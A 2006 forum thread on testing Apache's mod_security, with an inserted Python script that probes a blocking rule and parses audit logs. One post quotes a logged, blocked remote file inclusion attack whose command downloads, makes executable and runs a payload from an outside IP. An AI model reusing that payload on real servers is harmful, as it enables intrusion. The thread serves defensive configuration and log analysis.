

testing mod_security

Discussion in 'Security' started by embsupafly, Mar 9, 2006.

  1. embsupafly

    embsupafly Active Member

    I installed the mod_security module for apache and added a few example rulesets shared on this forum. Apache started ok when I was done and I did a config test and everything was ok. I tailed /usr/local/apache/logs/audit_log and nothing is showing up, there is actually nothing in the file. Does this mean there are no attacks yet? How can I simulate an attack to ensure that this is working ok?
     
  2. webignition

    webignition Well-Known Member

    The only way to be 100% sure that your rulesets are doing what they should is by checking each rule individually and trying to do something so that the rule is invoked - what this is depends entirely on the rule.

    However, if you want to test things in general, try finding a rule that relates to something inappropriate in a GET request - i.e. something bad in the URL.

    For example, if you have a rule that blocks requests with 'wget' in the URL, try visiting http://www.example.com/?wget and you should notice mod_sec blocking the request.

    If I remember correctly, the audit log is not updated in real time (I might be wrong), so don't expect anything in there immediately.
     
  3. sawbuck

    sawbuck Well-Known Member

  4. embsupafly

    embsupafly Active Member

    What were the attackers trying to do here?

    Code:
    Request: ***.***.com 82.185.246.179 - - [09/Mar/2006:04:33:41 -0500] "GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://204.83.56.144/cmd.gif?&cmd=cd%20/tmp;wget%20204.83.56.144/gicupo;chmod%20744%20gicupo;./gicupo;echo%20YYY;echo|  HTTP/1.1" 403 426 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" - "-"
    ----------------------------------------
    GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://204.83.56.144/cmd.gif?&cmd=cd%20/tmp;wget%20204.83.56.144/gicupo;chmod%20744%20gicupo;./gicupo;echo%20YYY;echo|  HTTP/1.1
    Host: **.**.***.***
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)
    mod_security-message: Access denied with code 403. Pattern match "wget " at THE_REQUEST
    mod_security-action: 403
    
    HTTP/1.1 403 Forbidden
    Transfer-Encoding: chunked
    Content-Type: text/html; charset=iso-8859-1
    --65e08270--
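As an added example (not code from this thread or from cPanel): a small Python script for the check webignition describes, which sends a probe request whose URL contains 'wget' and expects a 403, and then parses audit_log entries laid out like the one embsupafly posted above so you can see which rule fired. The log path, the probe URL and the sample entry are assumptions/constructed, not taken from a real server.

```python
import re
import urllib.error
import urllib.request

AUDIT_LOG = "/usr/local/apache/logs/audit_log"  # assumed cPanel path; adjust to your build
# Constructed sample in the mod_security 1.x audit_log layout shown in this thread
SAMPLE_AUDIT = """\
Request: www.example.com 192.0.2.10 - - [09/Mar/2006:04:33:41 -0500] "GET /?wget HTTP/1.1" 403 426 "-" "curl/7.15" - "-"
----------------------------------------
GET /?wget HTTP/1.1
Host: www.example.com
mod_security-message: Access denied with code 403. Pattern match "wget" at THE_REQUEST
mod_security-action: 403

HTTP/1.1 403 Forbidden
--65e08270--
"""

def http_status(url, timeout=5):
    """GET the URL and return the status code; a 403 is a result here, not an error."""
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            return resp.status
    except urllib.error.HTTPError as err:
        return err.code

def rule_fires(probe_url, expect=403, fetch=http_status):
    """True if the probe was refused with the status the rule is configured to return."""
    return fetch(probe_url) == expect

def parse_audit_log(text):
    """One dict per audit_log entry: raw request line, matched pattern, location, action."""
    entries = []
    for chunk in re.split(r"^Request: ", text, flags=re.MULTILINE)[1:]:
        lines = chunk.splitlines()
        entry = {"summary": lines[0], "request_line": None, "pattern": None, "location": None, "action": None}
        for i, line in enumerate(lines):
            if line.startswith("-----") and i + 1 < len(lines):
                entry["request_line"] = lines[i + 1]  # raw request follows the separator
            elif line.startswith("mod_security-message:"):
                m = re.search(r'Pattern match "(.*?)" at (\w+)', line)
                if m:
                    entry["pattern"], entry["location"] = m.groups()
            elif line.startswith("mod_security-action:"):
                entry["action"] = int(line.split(":", 1)[1])
        entries.append(entry)
    return entries

if __name__ == "__main__":
    print("rule fires on /?wget:", rule_fires("http://localhost/?wget"))
    for e in parse_audit_log(open(AUDIT_LOG).read()):
        print(e["action"], e["location"], repr(e["pattern"]), e["request_line"])
```

If the probe returns 403 but audit_log stays empty, check the mod_security logging directives in your httpd configuration rather than the rules themselves.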
    
     